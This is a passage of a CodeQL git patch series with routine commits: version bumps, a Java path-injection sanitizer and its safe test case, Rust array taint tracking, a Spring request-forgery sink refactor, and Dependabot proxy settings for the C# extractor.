a/shared/xml/qlpack.yml +++ b/shared/xml/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/xml -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/yaml/qlpack.yml b/shared/yaml/qlpack.yml index 998a94f4bbf..0c756e1edbb 100644 --- a/shared/yaml/qlpack.yml +++ b/shared/yaml/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/yaml -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/swift/ql/lib/qlpack.yml b/swift/ql/lib/qlpack.yml index 66fd8af358e..7752975faea 100644 --- a/swift/ql/lib/qlpack.yml +++ b/swift/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/swift-all -version: 3.0.0 +version: 3.0.1-dev groups: swift extractor: swift dbscheme: swift.dbscheme diff --git a/swift/ql/src/qlpack.yml b/swift/ql/src/qlpack.yml index ee53e55fe41..ec8e2cb9932 100644 --- a/swift/ql/src/qlpack.yml +++ b/swift/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/swift-queries -version: 1.0.13 +version: 1.0.14-dev groups: - swift - queries From 1ac6c3751bea31c12d6c6be156d04ec2c1f144c0 Mon Sep 17 00:00:00 2001 From: Andrew Eisenberg Date: Wed, 4 Dec 2024 11:41:40 -0800 Subject: [PATCH 0808/1267] Update action.yml to use artifacts@v4 v3 is getting deprecated. --- go/actions/test/action.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/go/actions/test/action.yml b/go/actions/test/action.yml index 5228f440971..0a4f13fa0ef 100644 --- a/go/actions/test/action.yml +++ b/go/actions/test/action.yml @@ -59,7 +59,7 @@ runs: - name: Upload qhelp markdown if: inputs.run-code-checks == 'true' && !cancelled() - uses: actions/upload-artifact@v3 + uses: actions/upload-artifact@v4 with: name: qhelp-markdown path: go/qhelp-out/**/*.md From 6fd9e19673e97dd3bf6da3d17a80f72ed20cd634 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 20:10:45 +0000 Subject: [PATCH 0809/1267] C++: Fix a join-order problem that happens on #18207. --- cpp/ql/src/Best Practices/GuardedFree.ql | 22 +++++++++++++++++++--- 1 file changed, 19 insertions(+), 3 deletions(-) diff --git a/cpp/ql/src/Best Practices/GuardedFree.ql b/cpp/ql/src/Best Practices/GuardedFree.ql index ea81a715828..3afe1a92e95 100644 --- a/cpp/ql/src/Best Practices/GuardedFree.ql +++ b/cpp/ql/src/Best Practices/GuardedFree.ql @@ -27,8 +27,12 @@ predicate blockContainsPreprocessorBranches(BasicBlock bb) { ) } -from GuardCondition gc, FreeCall fc, Variable v, BasicBlock bb -where +/** + * Holds if `gc` ensures that `v` is non-zero when reaching `bb`, and `bb` + * contains a single statement which is `fc`. + */ +pragma[nomagic] +private predicate interesting(GuardCondition gc, FreeCall fc, Variable v, BasicBlock bb) { gc.ensuresEq(v.getAnAccess(), 0, bb, false) and fc.getArgument(0) = v.getAnAccess() and bb = fc.getBasicBlock() and @@ -39,9 +43,21 @@ where // Block statement with a single nested statement: if (x) { free(x); } strictcount(bb.(BlockStmt).getAStmt()) = 1 ) and - strictcount(BasicBlock bb2 | gc.ensuresEq(_, 0, bb2, _) | bb2) = 1 and not fc.isInMacroExpansion() and not blockContainsPreprocessorBranches(bb) and not (gc instanceof BinaryOperation and not gc instanceof ComparisonOperation) and not exists(CommaExpr c | c.getAChild*() = fc) +} + +/** Holds if `gc` only guards a single block. */ +bindingset[gc] +pragma[inline_late] +private predicate guardConditionGuardsUniqueBlock(GuardCondition gc) { + strictcount(BasicBlock bb | gc.ensuresEq(_, 0, bb, _)) = 1 +} + +from GuardCondition gc, FreeCall fc, Variable v, BasicBlock bb +where + interesting(gc, fc, v, bb) and + guardConditionGuardsUniqueBlock(gc) select gc, "unnecessary NULL check before call to $@", fc, "free" From 121780c55a5fb5f2da85ea4cccdfdd50f34b5284 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 4 Dec 2024 16:56:49 -0500 Subject: [PATCH 0810/1267] Java: add File.getName as a path injection sanitizer --- .../semmle/code/java/security/PathSanitizer.qll | 15 +++++++++++++++ .../CWE-022/semmle/tests/TaintedPath.java | 15 +++++++++++++++ 2 files changed, 30 insertions(+) diff --git a/java/ql/lib/semmle/code/java/security/PathSanitizer.qll b/java/ql/lib/semmle/code/java/security/PathSanitizer.qll index 77803e3e27d..0d2e5cdfa7f 100644 --- a/java/ql/lib/semmle/code/java/security/PathSanitizer.qll +++ b/java/ql/lib/semmle/code/java/security/PathSanitizer.qll @@ -333,3 +333,18 @@ private Method getSourceMethod(Method m) { not exists(Method src | m = src.getKotlinParameterDefaultsProxy()) and result = m } + +/** + * A sanitizer that protects against path injection vulnerabilities + * by extracting the final component of the user provided path. + * + * TODO: convert this class to models-as-data if sanitizer support is added + */ +private class FileGetNameSanitizer extends PathInjectionSanitizer { + FileGetNameSanitizer() { + exists(MethodCall mc | + mc.getMethod().hasQualifiedName("java.io", "File", "getName") and + this.asExpr() = mc + ) + } +} diff --git a/java/ql/test/query-tests/security/CWE-022/semmle/tests/TaintedPath.java b/java/ql/test/query-tests/security/CWE-022/semmle/tests/TaintedPath.java index 8bfc35c1d96..00447364bb3 100644 --- a/java/ql/test/query-tests/security/CWE-022/semmle/tests/TaintedPath.java +++ b/java/ql/test/query-tests/security/CWE-022/semmle/tests/TaintedPath.java @@ -71,4 +71,19 @@ public class TaintedPath { fileLine = fileReader.readLine(); } } + + public void sendUserFileGood4(Socket sock, String user) throws IOException { + BufferedReader filenameReader = + new BufferedReader(new InputStreamReader(sock.getInputStream(), "UTF-8")); + String filename = filenameReader.readLine(); + File file = new File(filename); + String baseName = file.getName(); + // GOOD: only use the final component of the user provided path + BufferedReader fileReader = new BufferedReader(new FileReader(baseName)); + String fileLine = fileReader.readLine(); + while (fileLine != null) { + sock.getOutputStream().write(fileLine.getBytes()); + fileLine = fileReader.readLine(); + } + } } From d25045c936739e41f51792c1879e644f5321a9d4 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 5 Dec 2024 03:26:59 +0000 Subject: [PATCH 0811/1267] Bump golang.org/x/tools Bumps the extractor-dependencies group in /go/extractor with 1 update: [golang.org/x/tools](https://github.com/golang/tools). Updates `golang.org/x/tools` from 0.27.0 to 0.28.0 - [Release notes](https://github.com/golang/tools/releases) - [Commits](https://github.com/golang/tools/compare/v0.27.0...v0.28.0) --- updated-dependencies: - dependency-name: golang.org/x/tools dependency-type: direct:production update-type: version-update:semver-minor dependency-group: extractor-dependencies ... Signed-off-by: dependabot[bot] --- go/extractor/go.mod | 4 ++-- go/extractor/go.sum | 10 ++++++---- 2 files changed, 8 insertions(+), 6 deletions(-) diff --git a/go/extractor/go.mod b/go/extractor/go.mod index c5e1ecf09ff..af822b77eb9 100644 --- a/go/extractor/go.mod +++ b/go/extractor/go.mod @@ -10,7 +10,7 @@ toolchain go1.23.1 // bazel mod tidy require ( golang.org/x/mod v0.22.0 - golang.org/x/tools v0.27.0 + golang.org/x/tools v0.28.0 ) -require golang.org/x/sync v0.9.0 // indirect +require golang.org/x/sync v0.10.0 // indirect diff --git a/go/extractor/go.sum b/go/extractor/go.sum index a10e428fcbc..e3144c2c5f5 100644 --- a/go/extractor/go.sum +++ b/go/extractor/go.sum @@ -1,6 +1,8 @@ +github.com/google/go-cmp v0.6.0 h1:ofyhxvXcZhMsU5ulbFiLKl/XBFqE1GSq7atu8tAmTRI= +github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= golang.org/x/mod v0.22.0 h1:D4nJWe9zXqHOmWqj4VMOJhvzj7bEZg4wEYa759z1pH4= golang.org/x/mod v0.22.0/go.mod h1:6SkKJ3Xj0I0BrPOZoBy3bdMptDDU9oJrpohJ3eWZ1fY= -golang.org/x/sync v0.9.0 h1:fEo0HyrW1GIgZdpbhCRO0PkJajUS5H9IFUztCgEo2jQ= -golang.org/x/sync v0.9.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= -golang.org/x/tools v0.27.0 h1:qEKojBykQkQ4EynWy4S8Weg69NumxKdn40Fce3uc/8o= -golang.org/x/tools v0.27.0/go.mod h1:sUi0ZgbwW9ZPAq26Ekut+weQPR5eIM6GQLQ1Yjm1H0Q= +golang.org/x/sync v0.10.0 h1:3NQrjDixjgGwUOCaF8w2+VYHv0Ve/vGYSbdkTa98gmQ= +golang.org/x/sync v0.10.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= +golang.org/x/tools v0.28.0 h1:WuB6qZ4RPCQo5aP3WdKZS7i595EdWqWR8vqJTlwTVK8= +golang.org/x/tools v0.28.0/go.mod h1:dcIOrVd3mfQKTgrDVQHqCPMWy6lnhfhtX3hLXYVLfRw= From 44239cbf2e77945ed4ef4901cef928f8d5c390cb Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Thu, 5 Dec 2024 11:39:05 +0100 Subject: [PATCH 0812/1267] Rust: Add taint tests for arrays --- .../test/library-tests/dataflow/taint/main.rs | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) diff --git a/rust/ql/test/library-tests/dataflow/taint/main.rs b/rust/ql/test/library-tests/dataflow/taint/main.rs index 0ce5ba06391..ad29e0094e4 100644 --- a/rust/ql/test/library-tests/dataflow/taint/main.rs +++ b/rust/ql/test/library-tests/dataflow/taint/main.rs @@ -40,6 +40,37 @@ mod string { } } +mod array_source { + fn source(i: i64) -> [i64; 3] { + [i; 3] + } + + fn sink(i: i64) { + println!("{}", i); + } + + pub fn array_tainted() { + let arr = source(76); + sink(arr[1]); // $ MISSING: hasTaintFlow=76 + } +} + +mod array_sink { + fn source(i: i64) -> i64 { + i + } + + fn sink(s: [i64; 3]) { + println!("{}", s[1]); + } + + pub fn array_with_taint() { + let mut arr2 = [1, 2, 3]; + arr2[1] = source(36); + sink(arr2); // $ MISSING: hasTaintFlow=36 + } +} + use string::*; fn main() { @@ -47,4 +78,6 @@ fn main() { negation(); cast(); string_slice(); + array_source::array_tainted(); + array_sink::array_with_taint(); } From 1f4e7d1f37b6c7cecc2d06f3312da7055c6ea6ca Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Thu, 5 Dec 2024 11:41:32 +0100 Subject: [PATCH 0813/1267] Rust: Handle arrays in taint tracking --- .../rust/dataflow/internal/DataFlowImpl.qll | 4 ++-- .../dataflow/internal/TaintTrackingImpl.qll | 17 ++++++++++++++--- .../dataflow/taint/TaintFlowStep.expected | 3 +++ .../dataflow/taint/inline-taint-flow.expected | 10 ++++++++++ .../test/library-tests/dataflow/taint/main.rs | 4 ++-- 5 files changed, 31 insertions(+), 7 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index 236cae01c73..95d013814ed 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -626,7 +626,7 @@ private class StructFieldContent extends Content, TStructFieldContent { /** * Content stored at an element in an array. */ -final private class ArrayElementContent extends VariantContent, TArrayElement { +final class ArrayElementContent extends Content, TArrayElement { ArrayElementContent() { this = TArrayElement() } override string toString() { result = "array[]" } @@ -665,7 +665,7 @@ abstract class ContentSet extends TContentSet { abstract Content getAReadContent(); } -final private class SingletonContentSet extends ContentSet, TSingletonContentSet { +final class SingletonContentSet extends ContentSet, TSingletonContentSet { private Content c; SingletonContentSet() { this = TSingletonContentSet(c) } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll index faf80143b54..17e7469cb51 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll @@ -1,10 +1,9 @@ private import rust private import codeql.dataflow.TaintTracking private import codeql.rust.controlflow.CfgNodes -private import DataFlowImpl private import codeql.rust.dataflow.FlowSummary -private import FlowSummaryImpl as FlowSummaryImpl private import DataFlowImpl +private import FlowSummaryImpl as FlowSummaryImpl module RustTaintTracking implements InputSig { predicate defaultTaintSanitizer(Node::Node node) { none() } @@ -35,6 +34,15 @@ module RustTaintTracking implements InputSig { pred.asExpr() = index.getBase() and succ.asExpr() = index ) + or + // Although data flow through collections is modeled using stores/reads, + // we also allow taint to flow out of a tainted collection. This is + // needed in order to support taint-tracking configurations where the + // source is a collection. + exists(ContentSet cs | + RustDataFlow::readStep(pred, cs, succ) and + cs.(SingletonContentSet).getContent() instanceof ArrayElementContent + ) ) or FlowSummaryImpl::Private::Steps::summaryLocalStep(pred.(Node::FlowSummaryNode).getSummaryNode(), @@ -46,7 +54,10 @@ module RustTaintTracking implements InputSig { * and inputs to additional taint steps. */ bindingset[node] - predicate defaultImplicitTaintRead(Node::Node node, ContentSet c) { none() } + predicate defaultImplicitTaintRead(Node::Node node, ContentSet cs) { + exists(node) and + cs.(SingletonContentSet).getContent() instanceof ArrayElementContent + } /** * Holds if the additional step from `src` to `sink` should be considered in diff --git a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected index 04b8539a2ee..3b727d29b67 100644 --- a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected @@ -6,3 +6,6 @@ | main.rs:23:13:23:13 | a | main.rs:23:13:23:19 | a as u8 | | | main.rs:24:10:24:10 | b | main.rs:24:10:24:17 | b as i64 | | | main.rs:38:23:38:23 | s | main.rs:38:23:38:29 | s[...] | | +| main.rs:54:14:54:16 | arr | main.rs:54:14:54:19 | arr[1] | | +| main.rs:64:24:64:24 | s | main.rs:64:24:64:27 | s[1] | | +| main.rs:69:9:69:12 | arr2 | main.rs:69:9:69:15 | arr2[1] | | diff --git a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected index 37ea5f51c78..626607e043c 100644 --- a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected +++ b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected @@ -3,6 +3,9 @@ edges | main.rs:12:13:12:22 | source(...) | main.rs:13:10:13:14 | ... + ... | provenance | | | main.rs:17:13:17:22 | source(...) | main.rs:18:10:18:11 | - ... | provenance | | | main.rs:22:13:22:22 | source(...) | main.rs:24:10:24:17 | b as i64 | provenance | | +| main.rs:53:19:53:28 | source(...) | main.rs:54:14:54:19 | arr[1] | provenance | | +| main.rs:69:9:69:12 | [post] arr2 [array[]] | main.rs:70:14:70:17 | arr2 | provenance | | +| main.rs:69:19:69:28 | source(...) | main.rs:69:9:69:12 | [post] arr2 [array[]] | provenance | | nodes | main.rs:12:13:12:22 | source(...) | semmle.label | source(...) | | main.rs:13:10:13:14 | ... + ... | semmle.label | ... + ... | @@ -10,9 +13,16 @@ nodes | main.rs:18:10:18:11 | - ... | semmle.label | - ... | | main.rs:22:13:22:22 | source(...) | semmle.label | source(...) | | main.rs:24:10:24:17 | b as i64 | semmle.label | b as i64 | +| main.rs:53:19:53:28 | source(...) | semmle.label | source(...) | +| main.rs:54:14:54:19 | arr[1] | semmle.label | arr[1] | +| main.rs:69:9:69:12 | [post] arr2 [array[]] | semmle.label | [post] arr2 [array[]] | +| main.rs:69:19:69:28 | source(...) | semmle.label | source(...) | +| main.rs:70:14:70:17 | arr2 | semmle.label | arr2 | subpaths testFailures #select | main.rs:13:10:13:14 | ... + ... | main.rs:12:13:12:22 | source(...) | main.rs:13:10:13:14 | ... + ... | $@ | main.rs:12:13:12:22 | source(...) | source(...) | | main.rs:18:10:18:11 | - ... | main.rs:17:13:17:22 | source(...) | main.rs:18:10:18:11 | - ... | $@ | main.rs:17:13:17:22 | source(...) | source(...) | | main.rs:24:10:24:17 | b as i64 | main.rs:22:13:22:22 | source(...) | main.rs:24:10:24:17 | b as i64 | $@ | main.rs:22:13:22:22 | source(...) | source(...) | +| main.rs:54:14:54:19 | arr[1] | main.rs:53:19:53:28 | source(...) | main.rs:54:14:54:19 | arr[1] | $@ | main.rs:53:19:53:28 | source(...) | source(...) | +| main.rs:70:14:70:17 | arr2 | main.rs:69:19:69:28 | source(...) | main.rs:70:14:70:17 | arr2 | $@ | main.rs:69:19:69:28 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/taint/main.rs b/rust/ql/test/library-tests/dataflow/taint/main.rs index ad29e0094e4..71bababfba6 100644 --- a/rust/ql/test/library-tests/dataflow/taint/main.rs +++ b/rust/ql/test/library-tests/dataflow/taint/main.rs @@ -51,7 +51,7 @@ mod array_source { pub fn array_tainted() { let arr = source(76); - sink(arr[1]); // $ MISSING: hasTaintFlow=76 + sink(arr[1]); // $ hasTaintFlow=76 } } @@ -67,7 +67,7 @@ mod array_sink { pub fn array_with_taint() { let mut arr2 = [1, 2, 3]; arr2[1] = source(36); - sink(arr2); // $ MISSING: hasTaintFlow=36 + sink(arr2); // $ hasTaintFlow=36 } } From b20b7c7572104495ec8fddf957beb085c2597554 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 5 Dec 2024 10:43:13 +0000 Subject: [PATCH 0814/1267] Remove escaped "{" and "}" before counting placeholders --- .../semmle/code/java/frameworks/spring/SpringWebClient.qll | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll index 79f0cb9c8bb..9e6ac2c8601 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll @@ -56,7 +56,10 @@ private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink i <= max(int occurrenceIndex, int occurrenceOffset | exists( - hsp.getStringValue().regexpFind("\\{[^}]*\\}", occurrenceIndex, occurrenceOffset) + hsp.getStringValue() + .replaceAll("\\{", " ") + .replaceAll("\\}", " ") + .regexpFind("\\{[^}]*\\}", occurrenceIndex, occurrenceOffset) ) and occurrenceOffset < hsp.getOffset() | @@ -78,6 +81,8 @@ private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink mc.getArgument(0) .(CompileTimeConstantExpr) .getStringValue() + .replaceAll("\\{", " ") + .replaceAll("\\}", " ") .regexpFind("\\{[^}]*\\}", occurrenceIndex, _) ) | From 3061d4a51694b91fdb59e7261f2a411cd1cb9d73 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Thu, 5 Dec 2024 11:53:12 +0100 Subject: [PATCH 0815/1267] Rust: Minor tweaks --- rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll | 2 +- .../lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index 95d013814ed..b22b27c4db6 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -624,7 +624,7 @@ private class StructFieldContent extends Content, TStructFieldContent { } /** - * Content stored at an element in an array. + * An element in an array. */ final class ArrayElementContent extends Content, TArrayElement { ArrayElementContent() { this = TArrayElement() } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll index 17e7469cb51..13f0052a5ba 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll @@ -39,9 +39,9 @@ module RustTaintTracking implements InputSig { // we also allow taint to flow out of a tainted collection. This is // needed in order to support taint-tracking configurations where the // source is a collection. - exists(ContentSet cs | + exists(SingletonContentSet cs | RustDataFlow::readStep(pred, cs, succ) and - cs.(SingletonContentSet).getContent() instanceof ArrayElementContent + cs.getContent() instanceof ArrayElementContent ) ) or From 347fd575a2c52e9d8ed7d227c7702c2541711ba3 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 5 Dec 2024 11:15:43 +0000 Subject: [PATCH 0816/1267] Refactor to avoid duplicated logic --- .../frameworks/spring/SpringWebClient.qll | 89 ++++++++++--------- 1 file changed, 48 insertions(+), 41 deletions(-) diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll index 9e6ac2c8601..a9c3cd3cdd8 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll @@ -30,20 +30,50 @@ class SpringWebClient extends Interface { private import semmle.code.java.security.RequestForgery +/** The method `getForObject` on `org.springframework.web.reactive.function.client.RestTemplate`. */ +class SpringRestTemplateGetForObjectMethod extends Method { + SpringRestTemplateGetForObjectMethod() { + this.getDeclaringType() instanceof SpringRestTemplate and + this.hasName("getForObject") + } +} + +/** A call to the method `getForObject` on `org.springframework.web.reactive.function.client.RestTemplate`. */ +class SpringRestTemplateGetForObjectMethodCall extends MethodCall { + SpringRestTemplateGetForObjectMethodCall() { + this.getMethod() instanceof SpringRestTemplateGetForObjectMethod + } + + /** Gets the first argument, if it is a compile time constant. */ + CompileTimeConstantExpr getConstantUrl() { result = this.getArgument(0) } + + /** + * Holds if the first argument is a compile time constant and it has a + * placeholder at offset `offset`, and there are `idx` placeholders that + * appear before it. + */ + predicate urlHasPlaceholderAtOffset(int idx, int offset) { + exists( + this.getConstantUrl() + .getStringValue() + .replaceAll("\\{", " ") + .replaceAll("\\}", " ") + .regexpFind("\\{[^}]*\\}", idx, offset) + ) + } +} + private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink { SpringWebClientRestTemplateGetForObject() { - exists(Method m, MethodCall mc, int i | - m.getDeclaringType() instanceof SpringRestTemplate and - m.hasName("getForObject") and - mc.getMethod() = m and - // Note that mc.getArgument(0) is modeled separately. This model is for - // arguments beyond the first two. There are two relevant overloads, one - // with third parameter type `Object...` and one with third parameter - // type `Map`. For the latter we cannot deal with mapvalue - // content easily but there is a default implicit taint read at sinks - // that will catch it. - this.asExpr() = mc.getArgument(i + 2) and - i >= 0 + exists(SpringRestTemplateGetForObjectMethodCall mc, int i | + // Note that the first argument is modeled as a request forgery sink + // separately. This model is for arguments beyond the first two. There + // are two relevant overloads, one with third parameter type `Object...` + // and one with third parameter type `Map`. For the latter we + // cannot deal with MapValue content easily but there is a default + // implicit taint read at sinks that will catch it. + i >= 0 and + this.asExpr() = mc.getArgument(i + 2) | // If we can determine that part of mc.getArgument(0) is a hostname // sanitizing prefix, then we count how many placeholders occur before it @@ -51,20 +81,9 @@ private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink // For the `Map` overload this has the effect of only // considering the map values as sinks if there is at least one // placeholder in the URL before the hostname sanitizing prefix. - exists(HostnameSanitizingPrefix hsp | - hsp = mc.getArgument(0) and - i <= - max(int occurrenceIndex, int occurrenceOffset | - exists( - hsp.getStringValue() - .replaceAll("\\{", " ") - .replaceAll("\\}", " ") - .regexpFind("\\{[^}]*\\}", occurrenceIndex, occurrenceOffset) - ) and - occurrenceOffset < hsp.getOffset() - | - occurrenceIndex - ) + exists(int offset | + mc.urlHasPlaceholderAtOffset(i, offset) and + offset < mc.getConstantUrl().(HostnameSanitizingPrefix).getOffset() ) or // If we cannot determine that part of mc.getArgument(0) is a hostname @@ -74,24 +93,12 @@ private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink // For the `Map` overload this has the effect of only // considering the map values as sinks if there is at least one // placeholder in the URL. - not mc.getArgument(0) instanceof HostnameSanitizingPrefix and - i <= - max(int occurrenceIndex | - exists( - mc.getArgument(0) - .(CompileTimeConstantExpr) - .getStringValue() - .replaceAll("\\{", " ") - .replaceAll("\\}", " ") - .regexpFind("\\{[^}]*\\}", occurrenceIndex, _) - ) - | - occurrenceIndex - ) + not mc.getConstantUrl() instanceof HostnameSanitizingPrefix and + mc.urlHasPlaceholderAtOffset(i, _) or // If we cannot determine the string value of mc.getArgument(0), then we // conservatively consider all arguments as sinks. - not exists(mc.getArgument(0).(CompileTimeConstantExpr).getStringValue()) + not exists(mc.getConstantUrl().getStringValue()) ) } } From 537601290b235c80021d986e4245cbb18fbebc3a Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 11 Nov 2024 10:44:23 +0000 Subject: [PATCH 0817/1267] C#: Add `CODEQL_PROXY_*` environment variable names --- .../EnvironmentVariableNames.cs | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs index 345cb43453f..d825e5daeb0 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/EnvironmentVariableNames.cs @@ -74,5 +74,20 @@ namespace Semmle.Extraction.CSharp.DependencyFetching /// Specifies the location of the diagnostic directory. /// public const string DiagnosticDir = "CODEQL_EXTRACTOR_CSHARP_DIAGNOSTIC_DIR"; + + /// + /// Specifies the hostname of the Dependabot proxy. + /// + public const string ProxyHost = "CODEQL_PROXY_HOST"; + + /// + /// Specifies the hostname of the Dependabot proxy. + /// + public const string ProxyPort = "CODEQL_PROXY_PORT"; + + /// + /// Contains the certificate used by the Dependabot proxy. + /// + public const string ProxyCertificate = "CODEQL_PROXY_CA_CERTIFICATE"; } } From 232caa7185880c150566dd42224162be58feef33 Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 11 Nov 2024 11:25:13 +0000 Subject: [PATCH 0818/1267] C#: Add `DependabotProxy` class --- .../DependabotProxy.cs | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs new file mode 100644 index 00000000000..5b47189c745 --- /dev/null +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -0,0 +1,53 @@ +using System; +using System.IO; +using Semmle.Util; + +namespace Semmle.Extraction.CSharp.DependencyFetching +{ + internal class DependabotProxy + { + private readonly string? host; + private readonly string? port; + private readonly FileInfo? certFile; + + /// + /// The full address of the Dependabot proxy, if available. + /// + internal readonly string? Address; + + /// + /// Gets a value indicating whether a Dependabot proxy is configured. + /// + internal bool IsConfigured => !string.IsNullOrEmpty(this.Address); + + internal DependabotProxy(TemporaryDirectory tempWorkingDirectory) + { + // Obtain and store the address of the Dependabot proxy, if available. + this.host = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyHost); + this.port = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyPort); + + if (string.IsNullOrWhiteSpace(host) || string.IsNullOrWhiteSpace(port)) + { + return; + } + + this.Address = $"http://{this.host}:{this.port}"; + + // Obtain and store the proxy's certificate, if available. + var cert = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyCertificate); + + if (string.IsNullOrWhiteSpace(cert)) + { + return; + } + + var certDirPath = new DirectoryInfo(Path.Join(tempWorkingDirectory.DirInfo.FullName, ".dependabot-proxy")); + Directory.CreateDirectory(certDirPath.FullName); + + this.certFile = new FileInfo(Path.Join(certDirPath.FullName, "proxy.crt")); + + using var writer = this.certFile.CreateText(); + writer.Write(cert); + } + } +} From 8ca75602d8a5c25abdd770e0958981cfcb6ed218 Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Tue, 19 Nov 2024 12:26:54 +0000 Subject: [PATCH 0819/1267] C#: Initialise `DependabotProxy` in `DotNetCliInvoker` --- .../DotNet.cs | 2 +- .../DotNetCliInvoker.cs | 12 +++++++++++- 2 files changed, 12 insertions(+), 2 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs index edfea049a81..439f00754dd 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs @@ -27,7 +27,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching Info(); } - private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet")), logger, tempWorkingDirectory) { } + private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet"), tempWorkingDirectory), logger, tempWorkingDirectory) { } internal static IDotNet 